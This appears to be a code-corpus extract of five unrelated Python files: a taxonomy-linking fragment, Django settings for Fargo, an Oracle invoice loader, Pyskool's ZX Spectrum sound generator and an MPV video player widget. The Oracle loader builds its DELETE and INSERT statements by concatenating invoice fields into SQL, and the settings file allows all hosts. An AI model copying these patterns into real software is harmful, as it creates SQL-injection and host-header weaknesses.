"""
Given a Taxonomy object, this method searches for the root taxon
concept in the database, verifies whether it is already connected to
the MOL backbone taxonomy, and if not, attempts to create the Taxon
objects needed to link it to the backbone taxonomy. To do this, the
method loads all ancestors of the root of the provided taxonomy, and
checks if the top-most ancestor is the root of the backbone taxonomy.
If it not, then Catalog of Life is used to try to infer the missing
taxon nodes that connect the target taxonomy to the backbone taxonomy.
If the linking is succesful, the method returns True; otherwise, False
is returned.
"""
# Load any parent links to the target taxonomy from the database.
topnode = self.getLinksFromDB(taxonomy)
# See if we made it back to the root of the backbone taxonomy.
if topnode.equals(self.roottaxon):
# We did, so simply link the child of the returned node to our root taxon.
self.roottaxon.addChild(topnode.children[0])
success = True
else:
# Otherwise, try to use Catalog of Life to fill in any missing links.
success = self._buildCoLLinks(topnode)
return success
def _buildCoLLinks(self, taxon):
"""
Uses Catalog of Life to fill in missing taxa needed to link the target taxon to the
MOL backbone taxonomy. If linking was successful, the target taxon will be connected
to the backbone root taxon by one or more linking taxa. Returns True on success;
False otherwise.
"""
# Use the Catalog of Life names resolver to try to get higher taxonomy information
# for the taxon.
resolver = CoLNamesResolver()
searchres = resolver.searchCoLForTaxon(taxon, taxon.name.namestr, True)
if searchres == None:
return False
res, sname, srank, authorinfo = searchres
# Process each parent taxon in the CoL classification, creating a chain of Taxon
# objects to capture the higher taxonomy. Because the name resolver search method
# verifies that the kingdom is correct, we already know that we are connecting the
# taxonomy to the correct kingdom.
taxaxml = res.find('./classification')
# It is important that we use the rank system from the taxonomy (not the backbone)
# to ensure that rank name lookups retrieve the correct ID.
tranksys = taxon.ranksys
ranktable = taxon.rankt
curnode = self.roottaxon
for taxonxml in taxaxml:
namestr = taxonxml.find('name').text
rankstr = taxonxml.find('rank').text
child = curnode.createChild(ranktable.getID(rankstr, tranksys), namestr)
#print child
curnode = child
# Link the root of the target taxonomy to the backbone taxonomy.
curnode.addChild(taxon)
return True
def getLinksFromDB(self, taxonomy):
"""
Starting from the root node of the provided taxonomy, follows parent
links upward, building a chain of taxon objects until the top-most
parent is reached. Returns the top-most node that could be reached by
following the links upward.
"""
# See if the root taxon_concept already has a parent.
curnode = taxonomy.roottaxon
parent_id = taxonomy.roottaxon.getParentIDFromDB(self.pgcur)
# Follow parent links upwards until we reach the root or any other node
# that has no parent or does not yet exist in the database.
while parent_id != None and parent_id != self.NIL_UUID:
# Create the parent node and load it from the database.
parent = Taxon(curnode.taxonomy_id, curnode.rank_id, curnode.rankt)
parent.loadFromDB(self.pgcur, parent_id, maxdepth=0)
parent.addChild(curnode)
curnode = parent
parent_id = curnode.getParentIDFromDB(self.pgcur)
return curnode
def setNodeDepths(self):
"""
After linking a new taxonomy to the backbone taxonomy, the values of the depth
properties on the Taxon objects in the target taxonomy are likely to be incorrect.
This method will visit all nodes and set the correct value of the depth property
for each node.
"""
depthvisitor = DepthAdjustVisitor(0)
depthvisitor.visit(self.roottaxon)
|
stuckyb/sqlite_taxonomy
|
utilities/taxolib/taxonomy.py
|
Python
|
gpl-3.0
| 15,593
|
# Configuration for fargo.
# You can override Fargo default settings here
# Fargo is a Django application: for the full list of settings and their
# values, see https://docs.djangoproject.com/en/1.7/ref/settings/
# For more information on settings see
# https://docs.djangoproject.com/en/1.7/topics/settings/
# WARNING! Quick-start development settings unsuitable for production!
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# This file is sourced by "execfile" from /usr/lib/fargo/debian_config.py
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
#ADMINS = (
# # ('User 1', 'watchdog@example.net'),
# # ('User 2', 'janitor@example.net'),
#)
# ALLOWED_HOSTS must be correct in production!
# See https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [
'*',
]
# Databases
# Default: a local database named "fargo"
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# Warning: don't change ENGINE
# DATABASES['default']['NAME'] = 'fargo'
# DATABASES['default']['USER'] = 'fargo'
# DATABASES['default']['PASSWORD'] = '******'
# DATABASES['default']['HOST'] = 'localhost'
# DATABASES['default']['PORT'] = '5432'
LANGUAGE_CODE = 'fr-fr'
TIME_ZONE = 'Europe/Paris'
# Email configuration
# EMAIL_SUBJECT_PREFIX = '[fargo] '
# SERVER_EMAIL = 'root@fargo.example.org'
# DEFAULT_FROM_EMAIL = 'webmaster@fargo.example.org'
# SMTP configuration
# EMAIL_HOST = 'localhost'
# EMAIL_HOST_USER = ''
# EMAIL_HOST_PASSWORD = ''
# EMAIL_PORT = 25
# HTTPS Security
# CSRF_COOKIE_SECURE = True
# SESSION_COOKIE_SECURE = True
|
IMIO/docker-teleservices
|
config/fargo/settings.py
|
Python
|
gpl-3.0
| 1,635
|
# -*- coding: utf-8 -*-
from BaseOracle import *
from Factura import *
from ConfigDB import *
class CargaFacturaOracle(object):
def __init__(self):
pass
def carga(self, factura):
cfgOra = ConfigDB("oracle")
cfgOra.getConfig()
#cfgOra.imprimir()
oracle = BaseOracle(cfgOra.maquina, cfgOra.usuario, cfgOra.clave, cfgOra.servicio)
oracle.conectar()
oracle.ejecutar("delete ELE_DOCUMENTOS where CLAVE_ACCESO = '" + factura.claveAcceso + "'")
oracle.ejecutar("INSERT INTO ELE_DOCUMENTOS VALUES ('"
+ factura.claveAcceso + "','" + factura.documento + "','" + factura.razonSocial + "','"
+ factura.nombreComercial + "','" + factura.direccion + "','" + factura.establecimiento
+ "','"
+ factura.puntoEmision + "','" + factura.secuencial + "',TO_DATE('" + factura.fechaEmision
+ "', 'dd/mm/yyyy'),'" + factura.autorizacion + "','" + factura.tipo + "')")
i = 1
for det in factura.detalle:
oracle.ejecutar("INSERT INTO ELE_FACTURA_DETALLES"
+ "(CLAVE_ACCESO_ELE_DOCUMENTOS,NUMFILA,CODIGO_PRINCIPAL,DESCRIPCION,CANTIDAD,"
+ "PRECIO_UNITARIO,DESCUENTO,PRECIO_TOTAL_SIN_IMPUESTO)"
+ "VALUES ('" + factura.claveAcceso + "'," + str(i) + ",'" + det.codigoPrincipal + "','"
+ det.descripcion + "'," + str(det.cantidad) + "," + str(det.precioUnitario) + ","
+ str(det.descuento) + ","
+ str(det.total) + ")")
j = 1
for imp in det.impuesto:
oracle.ejecutar("INSERT INTO ELE_FACTURA_IMPUESTOS(CLAVE_ACCESO_ELE_DOCUMENTOS,"
+ "NUM_FILA_ELE_FACTURA_DETALLES,NUM_FILA,CODIGO,CODIGO_PORCENTAJE,TARIFA,"
+ "BASE_IMPONIBLE,VALOR) VALUES ('" + factura.claveAcceso + "'," + str(i) + ","
+ str(j) + ",'" + imp.codigo + "','" + imp.codigoPorcentaje + "',"
+ imp.tarifa + "," + imp.baseImponible + "," + imp.valor + ")")
j = j + 1
i = i + 1
oracle.desconectar()
|
jorjoluiso/RecupeEle
|
CargaFacturaOracle.py
|
Python
|
gpl-3.0
| 2,100
|
# -*- coding: utf-8 -*-
# Copyright 2013, 2014 Richard Dymond (rjdymond@gmail.com)
#
# This file is part of Pyskool.
#
# Pyskool is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# Pyskool is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pyskool. If not, see <http://www.gnu.org/licenses/>.
import os
import math
FRAME_T_STATES = 69888
INTERRUPT_DELAY = 942
CONTENTION_FACTOR = 0.34
SKOOL_DAZE = 'skool_daze'
BACK_TO_SKOOL = 'back_to_skool'
SKOOL_DAZE_TAKE_TOO = 'skool_daze_take_too'
EZAD_LOOKS = 'ezad_looks'
BACK_TO_SKOOL_DAZE = 'back_to_skool_daze'
NOTES = {
'F0': -7,
'G0': -6,
'A1': -5,
'B1': -4,
'C1': -3,
'D1': -2,
'E1': -1,
'F1': 0,
'G1': 1,
'A2': 2,
'B2': 3,
'C2': 4,
'D2': 5,
'E2': 6,
'F2': 7
}
# SD 32263, BTS 24560
PITCH_DATA = (
(47,196), # F1
(53,174), # G1
(60,154), # A2
(63,145), # B2
(71,129), # C2
(80,114), # D2
(86,107), # E2 ((90,101) in the original games, but unused)
(95,96), # F2
(107,86), # G2 (not in the original games)
)
def delays_to_samples(delays, sample_rate, max_amplitude):
sample_delay = 3500000.0 / sample_rate
samples = []
direction = 1
i = 0
d0 = 0
d1 = delays[i]
t = 0
while 1:
while t >= d1:
i += 1
if i >= len(delays):
break
d0 = d1
d1 += delays[i]
direction *= -1
if i >= len(delays):
break
sample = direction * int(max_amplitude * math.sin(math.pi * (t - d0) / (d1 - d0)))
if sample > 32767:
sample = 32767
elif sample < -32768:
sample = 32768
elif sample < 0:
sample += 65536
samples.append(sample)
t += sample_delay
return samples
def add_contention(delays, contention=True, interrupts=False, cycle=0):
c_start = 14334
c_end = 57248
for i, delay in enumerate(delays):
d = 0
while d < delay:
if interrupts and cycle == 0:
cycle = INTERRUPT_DELAY
if i:
delay += INTERRUPT_DELAY
end = min(FRAME_T_STATES, cycle + delay - d)
if contention and c_start <= end and cycle < c_end:
contended_cycles = min(c_end, end) - max(cycle, c_start)
delay += int(contended_cycles * CONTENTION_FACTOR)
d += end - cycle
cycle = end % FRAME_T_STATES
delays[i] = delay
def sd65122(d, e, h):
delays = []
for n in range(d or 256):
delays.append(13 * (e or 256) + 50)
e = (e + h) & 255
return delays
def bts62155(d, e, h):
delays = []
for n in range(d or 256):
delays.append(13 * (e or 256) + 50)
e = (e + h) & 255
if d & 1:
delays.append(13 * (e or 256) + 52)
return delays
def bts29836(b, de):
e, d = de % 256, de // 256
inner_delay = 13 * (b or 256) + 30
delays = [inner_delay] * ((e or 256) - 1)
if d > 1:
outer_delay = inner_delay + 11
inner_delays = [inner_delay] * 255
for n in range(d - 1):
delays.append(outer_delay)
delays.extend(inner_delays)
if de & 1 == 0:
delays.append(inner_delay + 13)
return delays
def jump():
# SD 60139
delays = sd65122(50, 96, 3)
delays.append(3282)
delays += [2532] * 7 # Walking sound (SD 65088)
add_contention(delays, contention=False, interrupts=True)
return delays
def catapult():
# SD 65141, BTS 63861
delays = sd65122(128, 0, 248)
add_contention(delays, contention=False, interrupts=True)
return delays
def shield():
# SD 58604
return sd65122(64, 0, 254) * 16
def hit(cycle):
# SD 60128
delays = [2532] * 15
delays[7] = 2589
add_contention(delays, contention=False, interrupts=True, cycle=cycle)
return delays
def hit0():
return hit(17472)
def hit1():
return hit(17472 * 3)
def bingo():
# BTS 62178#62404
delays = bts62155(255, 255, 255)
delays += ([83] + delays) * 4
add_contention(delays, contention=False, interrupts=True)
return delays
def sherry():
# BTS 23907#23988
delays = bts62155(0, 0, 2)
add_contention(delays, contention=False, interrupts=True)
return delays
def knocked_out():
# SD 65111, BTS 62094#62147
delays = sd65122(0, 0, 1)
add_contention(delays, contention=False, interrupts=True)
return delays
def mouse():
# BTS 28952#28964
squeak = bts29836(26, 1632)
pause_delay = 399464 + squeak[0]
delays = squeak + ([pause_delay] + squeak[1:]) * 2
add_contention(delays, interrupts=True)
return delays
def conker():
# BTS 29896#29978
delays = bts29836(40, 10240)
add_contention(delays, interrupts=True)
return delays
def safe_key():
# BTS 30804#30853
delays = bts29836(1, 256)
for n in range(255, 0, -1):
subdelays = bts29836((n & 63) + 1, 256)
delays.append(119 + subdelays[0])
delays.extend(subdelays[1:])
add_contention(delays, interrupts=True)
return delays
def bts_bell():
# BTS 32433#32492
delays = bts29836(128, 4096)
add_contention(delays, interrupts=True)
return delays
def sd_bell():
# SD 26450
delays = [1718] * 4600
add_contention(delays)
return delays
def sd_lines1():
# SD 30464#30544
delays = []
inner_delays = [296] * 255
for d in range(39):
delays.extend(inner_delays)
delays.append(307)
delays.extend(inner_delays)
add_contention(delays, interrupts=True)
return delays
def sd_lines2():
# SD 30464#30575
delays = []
inner_delays = [686] * 255
for d in range(19):
delays.extend(inner_delays)
delays.append(697)
delays.extend(inner_delays)
add_contention(delays, interrupts=True)
return delays
def bts_lines1():
# BTS 29716#29790
delays = bts29836(20, 10240)
add_contention(delays, interrupts=True)
return delays
def bts_lines2():
# BTS 29716#29818
delays = bts29836(50, 5120)
add_contention(delays, interrupts=True)
return delays
def convert_notes(notes, offset=0, tempo=1):
data = []
for note_spec in notes.split():
elements = note_spec.split('-')
beats = int(elements[1]) / float(tempo)
if elements[0] == 'R':
datum = (beats, None, None)
else:
note = NOTES[elements[0]] + offset
silence = 1 if len(elements) < 3 else 0
datum = (int(beats * 4) - silence, note, silence)
data.append(datum)
return data
def tune(notes):
# SD 32279
delays = []
for i, (beats, note, silence) in enumerate(notes):
if note is None:
delays.append(int(beats * 60543.5))
else:
duration, pitch = PITCH_DATA[note]
duration *= beats
duration //= 2
if i:
gap = 207 + 13 * prev_pitch + 24 * beats
if silence:
gap += 61617
delays.append(gap)
delays.extend([13 * pitch + 51] * (duration - 1))
prev_pitch = pitch
add_contention(delays)
return delays
def sd_tune():
notes = ' '.join((
'C2-2 A2-1 B2-2 G1-1',
'C2-2 A2-1 F1-2 F1-1',
'G1-2 A2-1 B2-1-0 A2-1 G1-1',
'C2-2 A2-1 F1-3',
'C2-2 A2-1 B2-1 B2-1 G1-1',
'C2-2 A2-1 F1-3',
'G1-1 G1-1 A2-1 B2-1 A2-1 G1-1',
'C2-2 A2-1 F1-3'
))
return tune(convert_notes(notes))
def all_shields():
notes = ' '.join((
'B2-1 B2-1 B2-1 C2-1 D2-2 C2-2',
'B2-1 D2-1 C2-1 C2-1 B2-3 R-4',
'B2-1 B2-1 B2-1 C2-1 D2-2 C2-2',
'B2-1 D2-1 C2-1 C2-1 B2-3 R-4',
'C2-1 C2-1 C2-1 C2-1 G1-2 G1-2',
'C2-1 B2-1 A2-1 G1-1 F1-4',
'B2-1 B2-1 B2-1 C2-1 D2-2 C2-2',
'B2-1 D2-1 C2-1 C2-1 B2-4'
))
return tune(convert_notes(notes))
def bts_tune():
notes = ' '.join((
'D2-2 F1-4 G1-2 B2-6 C2-2 D2-1 D2-3 D2-4 D2-8',
'F1-2 F1-4 G1-2 B2-4 B2-4 G1-4 F1-8',
'F1-4-0 D2-2 F1-4 G1-2 B2-6 C2-2 D2-1 D2-3 D2-4 D2-8',
'F2-6 D2-2 C2-4 D2-4 B2-4 B2-8 B2-4-0'
))
return tune(convert_notes(notes, tempo=2))
def up_a_year():
notes = ' '.join((
'B2-1 B2-1 B2-1 B2-2 D2-1 F2-2 D2-1 B2-2',
'B2-1 C2-2 C2-1 C2-2 B2-1 A2-2 G1-1 F1-3',
'B2-1 B2-1 B2-1 B2-2 D2-1 F2-2 D2-1 B2-2',
'B2-1 C2-2 C2-1 F1-1 G1-1-0 A2-1 B2-3 B2-3'
))
return tune(convert_notes(notes))
def sdtt_tune():
notes = ' '.join((
'E1-3 D1-1 C1-2 D1-2',
'E1-2 E1-2 E1-4',
'D1-2 D1-2 D1-4',
'E1-2 G1-2 G1-4',
'E1-3 D1-1 C1-2 D1-2',
'E1-2 E1-2 E1-2 E1-2',
'D1-2 D1-2 E1-2 D1-2',
'C1-8'
))
return tune(convert_notes(notes, 3))
def sdtt_all_shields():
notes = ' '.join((
'C2-3 D2-1 C2-2 B2-2',
'A2-2 B2-2 C2-4',
'G1-2 A2-2 B2-4',
'A2-2 B2-2 C2-4',
'C2-3 D2-1 C2-2 B2-2',
'A2-2 B2-2 C2-4',
'G1-4 C2-4',
'A2-2 F1-6'
))
return tune(convert_notes(notes))
def sdtt_open_safe():
notes = ' '.join((
'D1-2 D1-2 E1-2 C1-2',
'D1-2 E1-1-0 F1-1 E1-2 C1-2',
'D1-2 E1-1-0 F1-1 E1-2 D1-2',
'C1-2 D1-2 G0-4',
'E1-2 E1-2 F1-2 G1-2',
'G1-2 F1-2 E1-2 D1-2',
'C1-2 C1-2 D1-2 E1-2',
'D1-2 C1-2 C1-4'
))
return tune(convert_notes(notes, 6))
def sdtt_up_a_year():
notes = ' '.join((
'G1-2',
'G1-4 E1-2 F1-2',
'G1-4 E1-2 G1-2',
'G1-4 E1-2 A2-2',
'G1-4 E1-2 E1-2',
'F1-2 F1-2 D1-2 D1-2',
'F1-2 F1-2 D1-2 D1-2',
'G1-2 F1-2 E1-2 D1-2',
'E1-4 C1-4'
))
return tune(convert_notes(notes, 3))
def el_tune():
notes = ' '.join((
'C1-6',
'C1-6',
'C1-4 D1-2',
'E1-6',
'E1-4 D1-2',
'E1-4 F1-2',
'G1-12',
'C2-2 C2-2 C2-2',
'G1-2 G1-2 G1-2',
'E1-2 E1-2 E1-2',
'C1-2 C1-2 C1-2',
'G1-4 F1-2',
'E1-4 D1-2',
'C1-12'
))
return tune(convert_notes(notes, 3, 4.0/3))
def el_all_shields():
notes = ' '.join((
'C1-2 C1-2 A1-2 C1-2',
'D1-2 C1-2 A1-4',
'A1-2 G0-6',
'A1-2 G0-6',
'C1-2 C1-2 A1-2 C1-2',
'D1-2 C1-2 A1-4',
'G0-4 A1-2 G0-2',
'F0-8'
))
return tune(convert_notes(notes, 7))
def el_open_safe():
notes = ' '.join((
'C1-1-0 D1-1',
'E1-2 C1-2 G0-2',
'A1-2 C1-2 G0-2',
'A1-2 C1-2 G0-2',
'A1-2 C1-2 C1-1-0 D1-1',
'E1-2 C1-2 G0-2',
'A1-2 C1-2 G0-2',
'A1-2 C1-2 D1-2',
'C1-6'
))
return tune(convert_notes(notes, 7))
def el_up_a_year():
notes = ' '.join((
'C1-2 C1-2 D1-2 E1-2',
'C1-2 E1-2 D1-2 G0-2',
'C1-2 C1-2 D1-2 E1-2',
'C1-4 B1-4',
'C1-2 C1-2 D1-2 E1-2',
'F1-2 E1-2 D1-2 C1-2',
'B1-2 G0-2 A1-2 B1-2',
'C1-4 C1-4'
))
return tune(convert_notes(notes, 6))
def btsd_tune():
notes = ' '.join((
'C1-2 C1-2 C1-2 G0-2',
'A1-2 A1-2 G0-4',
'E1-2 E1-2 D1-2 D1-2',
'C1-6 G0-2',
'C1-2 C1-2 C1-2 G0-2',
'A1-2 A1-2 G0-4',
'E1-2 E1-2 D1-2 D1-2',
'C1-8'
))
return tune(convert_notes(notes, 6))
def btsd_all_shields():
notes = ' '.join((
'E1-2 E1-1-0 E1-1 C1-2 C1-2',
'E1-2 E1-2 G1-4',
'D1-2 D1-1-0 D1-1 B1-2 B1-2',
'D1-2 D1-2 F1-4',
'E1-2 E1-1-0 E1-1 C1-2 C1-2',
'E1-2 E1-2 G1-4',
'D1-2 E1-1-0 F1-1 E1-2 D1-2',
'C1-4 C1-4'
))
return tune(convert_notes(notes, 6))
def btsd_open_safe():
notes = ' '.join((
'C1-2 C1-1-0 C1-1 C1-2 C1-1-0 C1-1',
'E1-2 G1-1-0 G1-1 E1-2 C1-2',
'D1-2 D1-1-0 D1-1 D1-2 D1-1-0 D1-1',
'B1-2 D1-1-0 D1-1 B1-2 G0-2',
'C1-2 C1-1-0 C1-1 C1-2 C1-1-0 C1-1',
'E1-2 G1-1-0 G1-1 E1-2 C1-2',
'G1-2 F1-1-0 F1-1 E1-2 D1-2',
'C1-4 C1-4'
))
return tune(convert_notes(notes, 6))
def btsd_up_a_year():
notes = ' '.join((
'A2-2 C1-1-0 C1-1 C1-2 A2-2',
'A2-2 G1-2 G1-4',
'G1-2 C1-2 C1-1-0 C1-1 G1-2',
'G1-2 F1-2 F1-4',
'A2-2 C1-1-0 C1-1 C1-2 A2-2',
'A2-2 G1-2 G1-4',
'C2-2 C2-1-0 C2-1 C2-1-0 D2-1-0 C2-1-0 B2-1',
'A2-2 F1-2 F1-4'
))
return tune(convert_notes(notes, 3))
def bts_walk(cycle):
# BTS 29012
delays = [2532] * 6
add_contention(delays, interrupts=True, cycle=cycle)
return delays
def bts_walk0():
return bts_walk(8736)
def bts_walk1():
return bts_walk(8736 * 3)
def bts_walk2():
return bts_walk(8736 * 5)
def bts_walk3():
return bts_walk(8736 * 7)
def sd_walk(cycle):
# SD 65088
delays = [2532] * 7
add_contention(delays, contention=False, interrupts=True, cycle=cycle)
return delays
def sd_walk0():
return sd_walk(8736)
def sd_walk1():
return sd_walk(8736 * 7)
def _to_bytes4(num):
return (num & 255, (num >> 8) & 255, (num >> 16) & 255, num >> 24)
def write_text(f, text):
f.write(bytearray([ord(c) for c in text]))
def write_bytes(f, data):
f.write(bytearray(data))
def write_wav(samples, fname, sample_rate):
data_length = 2 * len(samples)
with open(fname, 'wb') as f:
write_text(f, 'RIFF')
write_bytes(f, _to_bytes4(36 + data_length))
write_text(f, 'WAVE')
write_text(f, 'fmt ')
write_bytes(f, (16, 0, 0, 0)) # length of fmt chunk (16)
write_bytes(f, (1, 0)) # format (1=PCM)
write_bytes(f, (1, 0)) # channels
write_bytes(f, _to_bytes4(sample_rate)) # sample rate
write_bytes(f, _to_bytes4(sample_rate * 2)) # byte rate
write_bytes(f, (2, 0)) # bytes per sample
write_bytes(f, (16, 0)) # bits per sample
write_text(f, 'data')
write_bytes(f, _to_bytes4(data_length)) # length of data chunk
for sample in samples:
write_bytes(f, (sample & 255, sample // 256))
FILES = {
'catapult': (catapult, 'common', 'catapult'),
'knocked-out': (knocked_out, 'common', 'knocked-out'),
'all-shields': (all_shields, 'skool_daze', 'all-shields'),
'sd-bell': (sd_bell, 'skool_daze', 'bell'),
'hit0': (hit0, 'skool_daze', 'hit0'),
'hit1': (hit1, 'skool_daze', 'hit1'),
'jump': (jump, 'skool_daze', 'jump'),
'sd-lines1': (sd_lines1, 'skool_daze', 'lines1'),
'sd-lines2': (sd_lines2, 'skool_daze', 'lines2'),
'shield': (shield, 'skool_daze', 'shield'),
'sd-tune': (sd_tune, 'skool_daze', 'tune'),
'sd-walk0': (sd_walk0, 'skool_daze', 'walk0'),
'sd-walk1': (sd_walk1, 'skool_daze', 'walk1'),
'bts-bell': (bts_bell, 'back_to_skool', 'bell'),
'bingo': (bingo, 'back_to_skool', 'bingo'),
'conker': (conker, 'back_to_skool', 'conker'),
'bts-lines1': (bts_lines1, 'back_to_skool', 'lines1'),
'bts-lines2': (bts_lines2, 'back_to_skool', 'lines2'),
'mouse': (mouse, 'back_to_skool', 'mouse'),
'safe-key': (safe_key, 'back_to_skool', 'safe-key'),
'sherry': (sherry, 'back_to_skool', 'sherry'),
'bts-tune': (bts_tune, 'back_to_skool', 'tune'),
'up-a-year': (up_a_year, 'back_to_skool', 'up-a-year'),
'bts-walk0': (bts_walk0, 'back_to_skool', 'walk0'),
'bts-walk1': (bts_walk1, 'back_to_skool', 'walk1'),
'bts-walk2': (bts_walk2, 'back_to_skool', 'walk2'),
'bts-walk3': (bts_walk3, 'back_to_skool', 'walk3'),
'sdtt-all-shields': (sdtt_all_shields, 'skool_daze_take_too', 'all-shields'),
'sdtt-open-safe': (sdtt_open_safe, 'skool_daze_take_too', 'open-safe'),
'sdtt-tune': (sdtt_tune, 'skool_daze_take_too', 'tune'),
'sdtt-up-a-year': (sdtt_up_a_year, 'skool_daze_take_too', 'up-a-year'),
'el-all-shields': (el_all_shields, 'ezad_looks', 'all-shields'),
'el-open-safe': (el_open_safe, 'ezad_looks', 'open-safe'),
'el-tune': (el_tune, 'ezad_looks', 'tune'),
'el-up-a-year': (el_up_a_year, 'ezad_looks', 'up-a-year'),
'btsd-all-shields': (btsd_all_shields, 'back_to_skool_daze', 'all-shields'),
'btsd-open-safe': (btsd_open_safe, 'back_to_skool_daze', 'open-safe'),
'btsd-tune': (btsd_tune, 'back_to_skool_daze', 'tune'),
'btsd-up-a-year': (btsd_up_a_year, 'back_to_skool_daze', 'up-a-year')
}
SOUNDS = {
SKOOL_DAZE: (
'catapult', 'knocked-out', 'all-shields', 'sd-bell', 'hit0', 'hit1',
'jump', 'sd-lines1', 'sd-lines2', 'shield', 'sd-tune', 'sd-walk0',
'sd-walk1'
),
BACK_TO_SKOOL: (
'catapult', 'knocked-out', 'bts-bell', 'bingo', 'conker', 'bts-lines1',
'bts-lines2', 'mouse', 'safe-key', 'sherry', 'bts-tune', 'up-a-year',
'bts-walk0', 'bts-walk1', 'bts-walk2', 'bts-walk3'
),
SKOOL_DAZE_TAKE_TOO: (
'catapult', 'knocked-out', 'sd-bell', 'hit0', 'hit1', 'jump',
'sd-lines1', 'sd-lines2', 'shield', 'sd-walk0', 'sd-walk1',
'sdtt-all-shields', 'sdtt-open-safe', 'sdtt-tune', 'sdtt-up-a-year'
),
EZAD_LOOKS: (
'catapult', 'knocked-out', 'sd-bell', 'hit0', 'hit1', 'jump',
'sd-lines1', 'sd-lines2', 'shield', 'sd-walk0', 'sd-walk1',
'el-all-shields', 'el-open-safe', 'el-tune', 'el-up-a-year'
),
BACK_TO_SKOOL_DAZE: (
'catapult', 'knocked-out', 'bts-bell', 'bingo', 'conker', 'bts-lines1',
'bts-lines2', 'mouse', 'safe-key', 'sherry', 'bts-walk0', 'bts-walk1',
'bts-walk2', 'bts-walk3', 'btsd-all-shields', 'btsd-open-safe',
'btsd-tune', 'btsd-up-a-year'
)
}
def create_sounds(game, odir, verbose=True, force=False, sample_rate=44100, max_amplitude=65536):
wrote_wavs = False
for sound in SOUNDS[game]:
delays_f, subdir, fname = FILES[sound]
sounds_dir = os.path.join(odir, subdir)
if not os.path.isdir(sounds_dir):
os.makedirs(sounds_dir)
wav = os.path.join(sounds_dir, fname + '.wav')
if force or not os.path.isfile(wav):
if verbose:
print('Writing {0}'.format(wav))
samples = delays_to_samples(delays_f(), sample_rate, max_amplitude)
write_wav(samples, wav, sample_rate)
wrote_wavs = True
if verbose and not wrote_wavs:
print("All sound files present")
|
skoolkid/pyskool
|
pyskool/skoolsound.py
|
Python
|
gpl-3.0
| 18,865
|
#!/usr/bin/env python3
import functools
from nxtools import logging, log_traceback
from .utils import (
Qt,
QWidget,
QSlider,
QTimer,
QHBoxLayout,
QVBoxLayout,
QIcon,
RegionBar,
TimecodeWindow,
get_navbar,
)
try:
from .mpv import MPV
has_mpv = True
except OSError:
has_mpv = False
log_traceback()
logging.warning(
"Unable to load MPV libraries. Video preview will not be available."
)
class DummyPlayer:
def property_observer(self, *args):
return lambda x: x
def __setitem__(self, key, value):
return
def __getitem__(self, key):
return
def play(self, *args, **kwargs):
pass
def seek(self, *args, **kwargs):
pass
def frame_step(self, *args, **kwargs):
pass
def frame_back_step(self, *args, **kwargs):
pass
class VideoPlayer(QWidget):
def __init__(self, parent=None, pixlib=None):
super(VideoPlayer, self).__init__(parent)
self.pixlib = pixlib
self.markers = {}
self.video_window = QWidget(self)
self.video_window.setStyleSheet("background-color: #161616;")
if not has_mpv:
self.player = DummyPlayer()
else:
try:
self.player = MPV(
keep_open=True, wid=str(int(self.video_window.winId()))
)
except Exception:
log_traceback(handlers=False)
self.player = DummyPlayer()
self.position = 0
self.duration = 0
self.mark_in = 0
self.mark_out = 0
self.fps = 25.0
self.loaded = False
self.duration_changed = False
self.prev_position = 0
self.prev_duration = 0
self.prev_mark_in = 0
self.prev_mark_out = 0
#
# Displays
#
self.mark_in_display = TimecodeWindow(self)
self.mark_in_display.setToolTip("Selection start")
self.mark_in_display.returnPressed.connect(
functools.partial(self.on_mark_in, self.mark_in_display)
)
self.mark_out_display = TimecodeWindow(self)
self.mark_out_display.setToolTip("Selection end")
self.mark_out_display.returnPressed.connect(
functools.partial(self.on_mark_out, self.mark_out_display)
)
self.io_display = TimecodeWindow(self)
self.io_display.setToolTip("Selection duration")
self.io_display.setReadOnly(True)
self.position_display = TimecodeWindow(self)
self.position_display.setToolTip("Clip position")
self.position_display.returnPressed.connect(
functools.partial(self.seek, self.position_display)
)
self.duration_display = TimecodeWindow(self)
self.duration_display.setToolTip("Clip duration")
self.duration_display.setReadOnly(True)
#
# Controls
#
self.timeline = QSlider(Qt.Horizontal)
self.timeline.setRange(0, 0)
self.timeline.sliderMoved.connect(self.on_timeline_seek)
self.region_bar = RegionBar(self)
self.navbar = get_navbar(self)
#
# Layout
#
bottom_bar = QHBoxLayout()
top_bar = QHBoxLayout()
top_bar.addWidget(self.mark_in_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.io_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.mark_out_display, 0)
bottom_bar.addWidget(self.position_display, 0)
bottom_bar.addWidget(self.navbar, 1)
bottom_bar.addWidget(self.duration_display, 0)
layout = QVBoxLayout()
layout.addLayout(top_bar)
layout.addWidget(self.video_window)
layout.addWidget(self.region_bar)
layout.addWidget(self.timeline)
layout.addLayout(bottom_bar)
self.setLayout(layout)
self.navbar.setFocus(True)
@self.player.property_observer("time-pos")
def time_observer(_name, value):
self.on_time_change(value)
@self.player.property_observer("duration")
def duration_observer(_name, value):
self.on_duration_change(value)
@self.player.property_observer("pause")
def pause_observer(_name, value):
self.on_pause_change(value)
# Displays updater
self.display_timer = QTimer()
self.display_timer.timeout.connect(self.on_display_timer)
self.display_timer.start(40)
@property
def frame_dur(self):
return 1 / self.fps
def load(self, path, mark_in=0, mark_out=0, markers={}):
self.loaded = False
self.markers = markers
self.player["pause"] = True
self.player.play(path)
self.prev_mark_in = -1
self.prev_mark_out = -1
self.mark_in = mark_in
self.mark_out = mark_out
self.mark_in_display.set_value(0)
self.mark_out_display.set_value(0)
self.duration_display.set_value(0)
self.position_display.set_value(0)
def on_time_change(self, value):
self.position = value
def on_duration_change(self, value):
if value:
self.duration = value
self.loaded = True
else:
self.duration = 0
self.loaded = False
self.duration_changed = True
self.region_bar.update()
def on_pause_change(self, value):
if hasattr(self, "action_play"):
self.action_play.setIcon(QIcon(self.pixlib[["pause", "play"][int(value)]]))
def on_timeline_seek(self):
if not self.loaded:
return
try:
self.player["pause"] = True
self.player.seek(self.timeline.value() / 100.0, "absolute", "exact")
except Exception:
pass
